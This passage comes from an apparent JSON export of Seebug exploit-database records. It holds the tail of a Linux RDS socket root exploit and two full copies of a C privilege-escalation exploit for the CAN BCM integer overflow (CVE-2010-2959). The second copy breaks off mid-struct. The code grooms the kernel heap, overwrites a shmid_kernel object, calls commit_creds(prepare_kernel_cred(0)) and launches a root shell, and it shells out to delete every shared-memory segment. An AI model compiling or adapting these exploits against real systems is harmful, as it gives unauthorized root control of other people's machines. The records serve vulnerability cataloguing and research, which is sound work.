(strncmp(ver.release, "2.6", 3))\r\n\t\toldstyle = 1;\r\n\tsprintf(sname, "/boot/System.map-%s", ver.release);\r\n\tf = fopen(sname, "r");\r\n\tif (f == NULL)\r\n\t\treturn 0;\r\n\trep = 1;\r\n\tgoto repeat;\r\n}\r\n\r\nint main(int argc, char * argv[])\r\n{\r\n\tunsigned long sec_ops, def_ops, cap_ptrace, target;\r\n\tint sendsock, recvsock;\r\n\tstruct utsname ver;\r\n\r\n\tprintf("[*] Linux kernel >= 2.6.30 RDS socket exploit\\n");\r\n\tprintf("[*] by Dan Rosenberg\\n");\r\n\r\n\tuname(&ver);\r\n\r\n\tif(strncmp(ver.release, "2.6.3", 5)) {\r\n\t\tprintf("[*] Your kernel is not vulnerable.\\n");\r\n\t\treturn -1;\r\n\t}\t\r\n\r\n\t/* Resolve addresses of relevant symbols */\r\n\tprintf("[*] Resolving kernel addresses...\\n");\r\n\tsec_ops = get_kernel_sym("security_ops");\r\n\tdef_ops = get_kernel_sym("default_security_ops");\r\n\tcap_ptrace = get_kernel_sym("cap_ptrace_traceme");\r\n\tcommit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n\tprepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n\r\n\tif(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {\r\n\t\tprintf("[*] Failed to resolve kernel symbols.\\n");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\t/* Calculate target */\r\n\ttarget = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));\r\n\r\n\tsendsock = prep_sock(SENDPORT);\r\n\trecvsock = prep_sock(RECVPORT);\r\n\r\n\t/* Reset security ops */\r\n\tprintf("[*] Overwriting security ops...\\n");\r\n\twrite_to_mem(sec_ops, def_ops, sendsock, recvsock);\r\n\r\n\t/* Overwrite ptrace_traceme security op fptr */\r\n\tprintf("[*] Overwriting function pointer...\\n");\r\n\twrite_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);\r\n\r\n\t/* Trigger the payload */\r\n\tprintf("[*] Triggering payload...\\n");\r\n\tptrace(PTRACE_TRACEME, 1, NULL, NULL);\r\n\t\r\n\t/* Restore the ptrace_traceme security op */\r\n\tprintf("[*] Restoring function pointer...\\n");\r\n\twrite_to_mem(target, cap_ptrace, sendsock, recvsock);\r\n\r\n\tif(getuid()) {\r\n\t\tprintf("[*] Exploit failed to get root.\\n");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tprintf("[*] Got root!\\n");\r\n\texecl("/bin/sh", "sh", NULL);\r\n\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70036", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:09:25", "description": "No description provided by source.", "cvss3": {}, "published": "2010-08-30T00:00:00", "type": "seebug", "title": "Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-2959"], "modified": "2010-08-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20073", "id": "SSV:20073", "sourceData": "\n /*\r\n * i-CAN-haz-MODHARDEN.c\r\n *\r\n * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959\r\n *\r\n * Ben Hawkes discovered an integer overflow in the Controller Area Network\r\n * (CAN) subsystem when setting up frame content and filtering certain\r\n * messages. An attacker could send specially crafted CAN traffic to crash\r\n * the system or gain root privileges.\r\n *\r\n * Usage:\r\n *\r\n * $ gcc i-can-haz-modharden.c -o i-can-haz-modharden\r\n * $ ./i-can-haz-modharden\r\n * ...\r\n * [+] launching root shell!\r\n * # id\r\n * uid=0(root) gid=0(root)\r\n *\r\n * Notes:\r\n *\r\n * The allocation pattern of the CAN BCM module gives us some desirable\r\n * properties for smashing the SLUB. We control the kmalloc with a 16-byte\r\n * granularity allowing us to place our allocation in the SLUB cache of our\r\n * choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for\r\n * old-times sake). The allocation can also be made in its own discrete\r\n * stage before the overwrite which allows us to be a bit more conservative\r\n * in ensuring the proper layout of our SLUB cache.\r\n *\r\n * To exploit the vulnerability, we first create a BCM RX op with a crafted\r\n * nframes to trigger the integer overflow during the kmalloc. On the second\r\n * call to update the existing RX op, we bypass the E2BIG check since the\r\n * stored nframes in the op is large, yet has an insufficiently sized\r\n * allocation associated with it. We then have a controlled write into the\r\n * adjacent shmid_kernel object in the 96-byte SLUB cache.\r\n *\r\n * However, while we control the length of the SLUB overwrite via a\r\n * memcpy_fromiovec operation, there exists a memset operation that directly\r\n * follows which zeros out last_frames, likely an adjacent allocation, with\r\n * the same malformed length, effectively nullifying our shmid smash. To\r\n * work around this, we take advantage of the fact that copy_from_user can\r\n * perform partial writes on x86 and trigger an EFAULT by setting up a\r\n * truncated memory mapping as the source for the memcpy_fromiovec operation,\r\n * allowing us to smash the necessary amount of memory and then pop out and\r\n * return early before the memset operation occurs.\r\n *\r\n * We then perform a dry-run and detect the shmid smash via an EIDRM errno\r\n * from shmat() caused by an invalid ipc_perm sequence number. Once we're\r\n * sure we have a shmid_kernel under our control we re-smash it with the\r\n * malformed version and redirect control flow to our credential modifying\r\n * calls mapped in user space.\r\n *\r\n * Distros: please use grsecurity's MODHARDEN or SELinux's module_request\r\n * to restrict unprivileged loading of uncommon packet families. Allowing\r\n * the loading of poorly-written PF modules just adds a non-trivial and\r\n * unnecessary attack surface to the kernel.\r\n *\r\n * Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports\r\n * easily to other vulnerable kernels/distros. Careful, it could use some\r\n * post-exploitation stability love as well.\r\n *\r\n * Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that\r\n * this exploit borrows code from.\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <inttypes.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/ipc.h>\r\n#include <sys/shm.h>\r\n#include <sys/mman.h>\r\n#include <sys/stat.h>\r\n \r\n#define SLUB "kmalloc-96"\r\n#define ALLOCATION 96\r\n#define FILLER 100\r\n \r\n#ifndef PF_CAN\r\n#define PF_CAN 29\r\n#endif\r\n \r\n#ifndef CAN_BCM\r\n#define CAN_BCM 2\r\n#endif\r\n \r\nstruct sockaddr_can {\r\n sa_family_t can_family;\r\n int can_ifindex;\r\n union {\r\n struct { uint32_t rx_id, tx_id; } tp;\r\n } can_addr;\r\n};\r\n \r\nstruct can_frame {\r\n uint32_t can_id;\r\n uint8_t can_dlc;\r\n uint8_t data[8] __attribute__((aligned(8)));\r\n};\r\n \r\nstruct bcm_msg_head {\r\n uint32_t opcode;\r\n uint32_t flags;\r\n uint32_t count;\r\n struct timeval ival1, ival2;\r\n uint32_t can_id;\r\n uint32_t nframes;\r\n struct can_frame frames[0];\r\n};\r\n \r\n#define RX_SETUP 5\r\n#define RX_DELETE 6\r\n#define CFSIZ sizeof(struct can_frame)\r\n#define MHSIZ sizeof(struct bcm_msg_head)\r\n#define IPCMNI 32768\r\n#define EIDRM 43\r\n#define HDRLEN_KMALLOC 8\r\n \r\nstruct list_head {\r\n struct list_head *next;\r\n struct list_head *prev;\r\n};\r\n \r\nstruct super_block {\r\n struct list_head s_list;\r\n unsigned int s_dev;\r\n unsigned long s_blocksize;\r\n unsigned char s_blocksize_bits;\r\n unsigned char s_dirt;\r\n uint64_t s_maxbytes;\r\n void *s_type;\r\n void *s_op;\r\n void *dq_op;\r\n void *s_qcop;\r\n void *s_export_op;\r\n unsigned long s_flags;\r\n} super_block;\r\n \r\nstruct mutex {\r\n unsigned int count;\r\n unsigned int wait_lock;\r\n struct list_head wait_list;\r\n void *owner;\r\n};\r\n \r\nstruct inode {\r\n struct list_head i_hash;\r\n struct list_head i_list;\r\n struct list_head i_sb_list;\r\n struct list_head i_dentry_list;\r\n unsigned long i_ino;\r\n unsigned int i_count;\r\n unsigned int i_nlink;\r\n unsigned int i_uid;\r\n unsigned int i_gid;\r\n unsigned int i_rdev;\r\n uint64_t i_version;\r\n uint64_t i_size;\r\n unsigned int i_size_seqcount;\r\n long i_atime_tv_sec;\r\n long i_atime_tv_nsec;\r\n long i_mtime_tv_sec;\r\n long i_mtime_tv_nsec;\r\n long i_ctime_tv_sec;\r\n long i_ctime_tv_nsec;\r\n uint64_t i_blocks;\r\n unsigned int i_blkbits;\r\n unsigned short i_bytes;\r\n unsigned short i_mode;\r\n unsigned int i_lock;\r\n struct mutex i_mutex;\r\n unsigned int i_alloc_sem_activity;\r\n unsigned int i_alloc_sem_wait_lock;\r\n struct list_head i_alloc_sem_wait_list;\r\n void *i_op;\r\n void *i_fop;\r\n struct super_block *i_sb;\r\n void *i_flock;\r\n void *i_mapping;\r\n char i_data[84];\r\n void *i_dquot_1;\r\n void *i_dquot_2;\r\n struct list_head i_devices;\r\n void *i_pipe_union;\r\n unsigned int i_generation;\r\n unsigned int i_fsnotify_mask;\r\n void *i_fsnotify_mark_entries;\r\n struct list_head inotify_watches;\r\n struct mutex inotify_mutex;\r\n} inode;\r\n \r\nstruct dentry {\r\n unsigned int d_count;\r\n unsigned int d_flags;\r\n unsigned int d_lock;\r\n int d_mounted;\r\n void *d_inode;\r\n struct list_head d_hash;\r\n void *d_parent;\r\n} dentry;\r\n \r\nstruct file_operations {\r\n void *owner;\r\n void *llseek;\r\n void *read;\r\n void *write;\r\n void *aio_read;\r\n void *aio_write;\r\n void *readdir;\r\n void *poll;\r\n void *ioctl;\r\n void *unlocked_ioctl;\r\n void *compat_ioctl;\r\n void *mmap;\r\n void *open;\r\n void *flush;\r\n void *release;\r\n void *fsync;\r\n void *aio_fsync;\r\n void *fasync;\r\n void *lock;\r\n void *sendpage;\r\n void *get_unmapped_area;\r\n void *check_flags;\r\n void *flock;\r\n void *splice_write;\r\n void *splice_read;\r\n void *setlease;\r\n} op;\r\n \r\nstruct vfsmount {\r\n struct list_head mnt_hash;\r\n void *mnt_parent;\r\n void *mnt_mountpoint;\r\n void *mnt_root;\r\n void *mnt_sb;\r\n struct list_head mnt_mounts;\r\n struct list_head mnt_child;\r\n int mnt_flags;\r\n const char *mnt_devname;\r\n struct list_head mnt_list;\r\n struct list_head mnt_expire;\r\n struct list_head mnt_share;\r\n struct list_head mnt_slave_list;\r\n struct list_head mnt_slave;\r\n struct vfsmount *mnt_master;\r\n struct mnt_namespace *mnt_ns;\r\n int mnt_id;\r\n int mnt_group_id;\r\n int mnt_count;\r\n} vfsmount;\r\n \r\nstruct file {\r\n struct list_head fu_list;\r\n struct vfsmount *f_vfsmnt;\r\n struct dentry *f_dentry;\r\n void *f_op;\r\n unsigned int f_lock;\r\n unsigned long f_count;\r\n} file;\r\n \r\nstruct kern_ipc_perm {\r\n unsigned int lock;\r\n int deleted;\r\n int id;\r\n unsigned int key;\r\n unsigned int uid;\r\n unsigned int gid;\r\n unsigned int cuid;\r\n unsigned int cgid;\r\n unsigned int mode;\r\n unsigned int seq;\r\n void *security;\r\n};\r\n \r\nstruct shmid_kernel {\r\n struct kern_ipc_perm shm_perm;\r\n struct file *shm_file;\r\n unsigned long shm_nattch;\r\n unsigned long shm_segsz;\r\n time_t shm_atim;\r\n time_t shm_dtim;\r\n time_t shm_ctim;\r\n unsigned int shm_cprid;\r\n unsigned int shm_lprid;\r\n void *mlock_user;\r\n} shmid_kernel;\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\nint __attribute__((regparm(3)))\r\nkernel_code(struct file *file, void *vma)\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n}\r\n \r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n int ret = 0, oldstyle;\r\n \r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n return 0;\r\n oldstyle = 1;\r\n }\r\n \r\n while (ret != EOF) {\r\n if (!oldstyle) {\r\n ret = fscanf(f, "%p %c %s\\n", (void **) &addr, &dummy, sname);\r\n } else {\r\n ret = fscanf(f, "%p %s\\n", (void **) &addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S.")) {\r\n continue;\r\n }\r\n p = strrchr(sname, '_');\r\n if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_') {\r\n p--;\r\n }\r\n *p = '\\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n printf("[+] resolved symbol %s to %p\\n", name, (void *) addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n \r\n return 0;\r\n}\r\n \r\nint\r\ncheck_slabinfo(char *cache, int *active_out, int *total_out)\r\n{\r\n FILE *fp;\r\n char name[64], slab[256];\r\n int active, total, diff;\r\n \r\n memset(slab, 0, sizeof(slab));\r\n memset(name, 0, sizeof(name));\r\n \r\n fp = fopen("/proc/slabinfo", "r");\r\n if (!fp) {\r\n printf("[-] sorry, /proc/slabinfo is not available!");\r\n exit(1);\r\n }\r\n \r\n fgets(slab, sizeof(slab) - 1, fp);\r\n while (1) {\r\n fgets(slab, sizeof(slab) - 1, fp);\r\n sscanf(slab, "%s %u %u", name, &active, &total);\r\n diff = total - active;\r\n if (strcmp(name, cache) == 0) {\r\n break;\r\n }\r\n }\r\n fclose(fp);\r\n \r\n if (active_out) {\r\n *active_out = active;\r\n }\r\n if (total_out) {\r\n *total_out = total;\r\n }\r\n return diff;\r\n}\r\n \r\nvoid\r\ntrigger(void)\r\n{\r\n int *shmids;\r\n int i, ret, sock, cnt, base, smashed;\r\n int diff, active, total, active_new, total_new;\r\n int len, sock_len, mmap_len;\r\n struct sockaddr_can addr;\r\n struct bcm_msg_head *msg;\r\n void *efault;\r\n char *buf;\r\n \r\n printf("[+] creating PF_CAN socket...\\n");\r\n \r\n sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);\r\n if (sock < 0) {\r\n printf("[-] kernel lacks CAN packet family support\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] connecting PF_CAN socket...\\n");\r\n \r\n memset(&addr, 0, sizeof(addr));\r\n addr.can_family = PF_CAN;\r\n \r\n ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));\r\n if (sock < 0) {\r\n printf("[-] could not connect CAN socket\\n");\r\n exit(1);\r\n }\r\n \r\n len = MHSIZ + (CFSIZ * (ALLOCATION / 16));\r\n msg = malloc(len);\r\n memset(msg, 0, len);\r\n msg->can_id = 2959;\r\n msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;\r\n \r\n printf("[+] clearing out any active OPs via RX_DELETE...\\n");\r\n \r\n msg->opcode = RX_DELETE;\r\n ret = send(sock, msg, len, 0);\r\n \r\n printf("[+] removing any active user-owned shmids...\\n");\r\n \r\n system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;");\r\n \r\n printf("[+] massaging " SLUB " SLUB cache with dummy allocations\\n");\r\n \r\n diff = check_slabinfo(SLUB, &active, &total);\r\n \r\n shmids = malloc(sizeof(int) * diff * 10);\r\n \r\n cnt = diff * 10;\r\n for (i = 0; i < cnt; ++i) {\r\n diff = check_slabinfo(SLUB, &active, &total);\r\n if (diff == 0) {\r\n break;\r\n }\r\n shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\r\n }\r\n base = i;\r\n \r\n if (diff != 0) {\r\n printf("[-] inconsistency detected with SLUB cache allocation, please try again\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...\\n");\r\n \r\n i = base;\r\n cnt = i + FILLER;\r\n for (; i < cnt; ++i) {\r\n shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\r\n }\r\n \r\n msg->opcode = RX_SETUP;\r\n ret = send(sock, msg, len, 0);\r\n if (ret < 0) {\r\n printf("[-] kernel rejected malformed CAN header\\n");\r\n exit(1);\r\n }\r\n \r\n i = base + FILLER;\r\n cnt = i + FILLER;\r\n for (; i < cnt; ++i) {\r\n shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\r\n }\r\n \r\n printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\\n");\r\n \r\n mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);\r\n sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);\r\n efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n \r\n printf("[+] mmap'ed mapping of length %d at %p\\n", mmap_len, efault);\r\n \r\n printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\\n");\r\n \r\n msg = (struct bcm_msg_head *) efault;\r\n memset(msg, 0, mmap_len);\r\n msg->can_id = 2959;\r\n msg->nframes = (ALLOCATION / 16) * 4;\r\n \r\n msg->opcode = RX_SETUP;\r\n ret = send(sock, msg, mmap_len, 0);\r\n if (ret != -1 && errno != EFAULT) {\r\n printf("[-] couldn't trigger EFAULT, exploit aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] seeking out the smashed shmid_kernel...\\n");\r\n \r\n i = base;\r\n cnt = i + FILLER + FILLER;\r\n for (; i < cnt; ++i) {\r\n ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);\r\n if (ret == -1 && errno == EIDRM) {\r\n smashed = i;\r\n break;\r\n }\r\n }\r\n if (i == cnt) {\r\n printf("[-] could not find smashed shmid, trying running the exploit again!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %d\\n", i, shmids[i]);\r\n \r\n printf("[+] re-smashing the shmid_kernel with exploit payload...\\n");\r\n \r\n shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI;\r\n \r\n buf = (char *) msg;\r\n memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));\r\n \r\n msg->opcode = RX_SETUP;\r\n ret = send(sock, msg, mmap_len, 0);\r\n if (ret != -1 && errno != EFAULT) {\r\n printf("[-] couldn't trigger EFAULT, exploit aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);\r\n if (ret == -1 && errno != EIDRM) {\r\n setresuid(0, 0, 0);\r\n setresgid(0, 0, 0);\r\n \r\n printf("[+] launching root shell!\\n");\r\n \r\n execl("/bin/bash", "/bin/bash", NULL);\r\n exit(0);\r\n }\r\n \r\n printf("[-] exploit failed! retry?\\n");\r\n}\r\n \r\nvoid\r\nsetup(void)\r\n{\r\n printf("[+] looking for symbols...\\n");\r\n \r\n commit_creds = (_commit_creds) get_symbol("commit_creds");\r\n if (!commit_creds) {\r\n printf("[-] symbol table not availabe, aborting!\\n");\r\n }\r\n \r\n prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");\r\n if (!prepare_kernel_cred) {\r\n printf("[-] symbol table not availabe, aborting!\\n");\r\n }\r\n \r\n printf("[+] setting up exploit payload...\\n");\r\n \r\n super_block.s_flags = 0;\r\n \r\n inode.i_size = 4096;\r\n inode.i_sb = &super_block;\r\n inode.inotify_watches.next = &inode.inotify_watches;\r\n inode.inotify_watches.prev = &inode.inotify_watches;\r\n inode.inotify_mutex.count = 1;\r\n \r\n dentry.d_count = 4096;\r\n dentry.d_flags = 4096;\r\n dentry.d_parent = NULL;\r\n dentry.d_inode = &inode;\r\n \r\n op.mmap = &kernel_code;\r\n op.get_unmapped_area = &kernel_code;\r\n \r\n vfsmount.mnt_flags = 0;\r\n vfsmount.mnt_count = 1;\r\n \r\n file.fu_list.prev = &file.fu_list;\r\n file.fu_list.next = &file.fu_list;\r\n file.f_dentry = &dentry;\r\n file.f_vfsmnt = &vfsmount;\r\n file.f_op = &op;\r\n \r\n shmid_kernel.shm_perm.key = IPC_PRIVATE;\r\n shmid_kernel.shm_perm.uid = getuid();\r\n shmid_kernel.shm_perm.gid = getgid();\r\n shmid_kernel.shm_perm.cuid = getuid();\r\n shmid_kernel.shm_perm.cgid = getgid();\r\n shmid_kernel.shm_perm.mode = -1;\r\n shmid_kernel.shm_file = &file;\r\n}\r\n \r\nint\r\nmain(int argc, char **argv)\r\n{\r\n setup();\r\n trigger();\r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20073", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T14:43:17", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-2959"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-69718", "id": "SSV:69718", "sourceData": "\n /*\r\n * i-CAN-haz-MODHARDEN.c\r\n *\r\n * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959\r\n *\r\n * Ben Hawkes discovered an integer overflow in the Controller Area Network\r\n * (CAN) subsystem when setting up frame content and filtering certain \r\n * messages. An attacker could send specially crafted CAN traffic to crash \r\n * the system or gain root privileges. \r\n *\r\n * Usage:\r\n *\r\n * $ gcc i-can-haz-modharden.c -o i-can-haz-modharden\r\n * $ ./i-can-haz-modharden\r\n * ...\r\n * [+] launching root shell!\r\n * # id\r\n * uid=0(root) gid=0(root)\r\n *\r\n * Notes:\r\n *\r\n * The allocation pattern of the CAN BCM module gives us some desirable \r\n * properties for smashing the SLUB. We control the kmalloc with a 16-byte\r\n * granularity allowing us to place our allocation in the SLUB cache of our\r\n * choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for \r\n * old-times sake). The allocation can also be made in its own discrete \r\n * stage before the overwrite which allows us to be a bit more conservative \r\n * in ensuring the proper layout of our SLUB cache.\r\n *\r\n * To exploit the vulnerability, we first create a BCM RX op with a crafted \r\n * nframes to trigger the integer overflow during the kmalloc. On the second\r\n * call to update the existing RX op, we bypass the E2BIG check since the \r\n * stored nframes in the op is large, yet has an insufficiently sized \r\n * allocation associated with it. We then have a controlled write into the \r\n * adjacent shmid_kernel object in the 96-byte SLUB cache.\r\n *\r\n * However, while we control the length of the SLUB overwrite via a \r\n * memcpy_fromiovec operation, there exists a memset operation that directly \r\n * follows which zeros out last_frames, likely an adjacent allocation, with \r\n * the same malformed length, effectively nullifying our shmid smash. To \r\n * work around this, we take advantage of the fact that copy_from_user can\r\n * perform partial writes on x86 and trigger an EFAULT by setting up a \r\n * truncated memory mapping as the source for the memcpy_fromiovec operation,\r\n * allowing us to smash the necessary amount of memory and then pop out and \r\n * return early before the memset operation occurs.\r\n *\r\n * We then perform a dry-run and detect the shmid smash via an EIDRM errno \r\n * from shmat() caused by an invalid ipc_perm sequence number. Once we're \r\n * sure we have a shmid_kernel under our control we re-smash it with the \r\n * malformed version and redirect control flow to our credential modifying\r\n * calls mapped in user space.\r\n *\r\n * Distros: please use grsecurity's MODHARDEN or SELinux's module_request \r\n * to restrict unprivileged loading of uncommon packet families. Allowing\r\n * the loading of poorly-written PF modules just adds a non-trivial and \r\n * unnecessary attack surface to the kernel. \r\n *\r\n * Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports \r\n * easily to other vulnerable kernels/distros. Careful, it could use some \r\n * post-exploitation stability love as well.\r\n *\r\n * Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that \r\n * this exploit borrows code from.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <inttypes.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/ipc.h>\r\n#include <sys/shm.h>\r\n#include <sys/mman.h>\r\n#include <sys/stat.h>\r\n\r\n#define SLUB "kmalloc-96"\r\n#define ALLOCATION 96\r\n#define FILLER 100\r\n\r\n#ifndef PF_CAN\r\n#define PF_CAN 29\r\n#endif\r\n\r\n#ifndef CAN_BCM\r\n#define CAN_BCM 2\r\n#endif\r\n\r\nstruct sockaddr_can {\r\n\tsa_family_t can_family;\r\n\tint can_ifindex;\r\n\tunion {\r\n\t\tstruct { uint32_t rx_id, tx_id; } tp;\r\n\t} can_addr;\r\n};\r\n\r\nstruct can_frame {\r\n\tuint32_t can_id;\r\n\tuint8_t can_dlc;\r\n\tuint8_t data[8] __attribute__((aligned(8)));\r\n};\r\n\r\nstruct bcm_msg_head {\r\n\tuint32_t opcode;\r\n\tuint32_t flags;\r\n\tuint32_t count;\r\n\tstruct timeval ival1, ival2;\r\n\tuint32_t can_id;\r\n\tuint32_t nframes;\r\n\tstruct can_frame frames[0];\r\n};\r\n\r\n#define RX_SETUP 5\r\n#define RX_DELETE 6\r\n#define CFSIZ sizeof(struct can_frame)\r\n#define MHSIZ sizeof(struct bcm_msg_head)\r\n#define IPCMNI 32768\r\n#define\tEIDRM 43\r\n#define HDRLEN_KMALLOC 8\r\n\r\nstruct list_head {\r\n\tstruct list_head *next;\r\n\tstruct list_head *prev;\r\n};\r\n\r\nstruct super_block {\r\n\tstruct list_head s_list;\r\n\tunsigned int s_dev;\r\n\tunsigned long s_blocksize;\r\n\tunsigned char s_blocksize_bits;\r\n\tunsigned char s_dirt;\r\n\tuint64_t s_maxbytes;\r\n\tvoid *s_type;\r\n\tvoid *s_op;\r\n\tvoid *dq_op;\r\n\tvoid *s_qcop;\r\n\tvoid *s_export_op;\r\n\tunsigned long s_flags;\r\n} super_block;\r\n\r\nstruct mutex {\r\n\tunsigned int count;\r\n\tunsigned int wait_lock;\r\n\tstruct list_head wait_list;\r\n\tvoid *owner;\r\n};\r\n\r\nstruct inode {\r\n\tstruct list_head i_hash;\r\n\tstruct list_head i_list;\r\n\tstruct list_head i_sb_list;\r\n\tstruct list_head i_dentry_list;\r\n\tunsigned long i_ino;\r\n\tunsigned int i_count;\r\n\tunsigned int i_nlink;\r\n\tunsigned int i_uid;\r\n\tunsigned int i_gid;\r\n\tunsigned int i_rdev;\r\n\tuint64_t i_version;\r\n\tuint64_t i_size;\r\n\tunsigned int i_size_seqcount;\r\n\tlong i_atime_tv_sec;\r\n\tlong i_atime_tv_nsec;\r\n\tlong i_mtime_tv_sec;\r\n\tlong i_mtime_tv_nsec;\r\n\tlong i_ctime_tv_sec;\r\n\tlong i_ctime_tv_nsec;\r\n\tuint64_t i_blocks;\r\n\tunsigned int i_blkbits;\r\n\tunsigned short i_bytes;\r\n\tunsigned short i_mode;\r\n\tunsigned int i_lock;\r\n\tstruct mutex i_mutex;\r\n\tunsigned int i_alloc_sem_activity;\r\n\tunsigned int i_alloc_sem_wait_lock;\r\n\tstruct list_head i_alloc_sem_wait_list;\r\n\tvoid *i_op;\r\n\tvoid *i_fop;\r\n\tstruct super_block *i_sb;\r\n\tvoid *i_flock;\r\n\tvoid *i_mapping;\r\n\tchar i_data[84];\r\n\tvoid *i_dquot_1;\r\n\tvoid *i_dquot_2;\r\n\tstruct list_head i_devices;\r\n\tvoid *i_pipe_union;\r\n\tunsigned int i_generation;\r\n\tunsigned int i_fsnotify_mask;\r\n\tvoid *i_fsnotify_mark_entries;\r\n\tstruct list_head inotify_watches;\r\n\tstruct mutex inotify_mutex;\r\n} inode;\r\n\r\nstruct dentry {\r\n\tunsigned int d_count;\r\n\tunsigned int d_flags;\r\n\tunsigned int d_lock;\r\n\tint d_mounted;\r\n\tvoid *d_inode;\r\n\tstruct list_head d_hash;\r\n\tvoid *d_parent;\r\n} dentry;\r\n\r\nstruct file_operations {\r\n\tvoid *owner;\r\n\tvoid *llseek;\r\n\tvoid *read;\r\n\tvoid *write;\r\n\tvoid *aio_read;\r\n\tvoid *aio_write;\r\n\tvoid *readdir;\r\n\tvoid *poll;\r\n\tvoid *ioctl;\r\n\tvoid *unlocked_ioctl;\r\n\tvoid *compat_ioctl;\r\n\tvoid *mmap;\r\n\tvoid *open;\r\n\tvoid *flush;\r\n\tvoid *release;\r\n\tvoid *fsync;\r\n\tvoid *aio_fsync;\r\n\tvoid *fasync;\r\n\tvoid *lock;\r\n\tvoid *sendpage;\r\n\tvoid 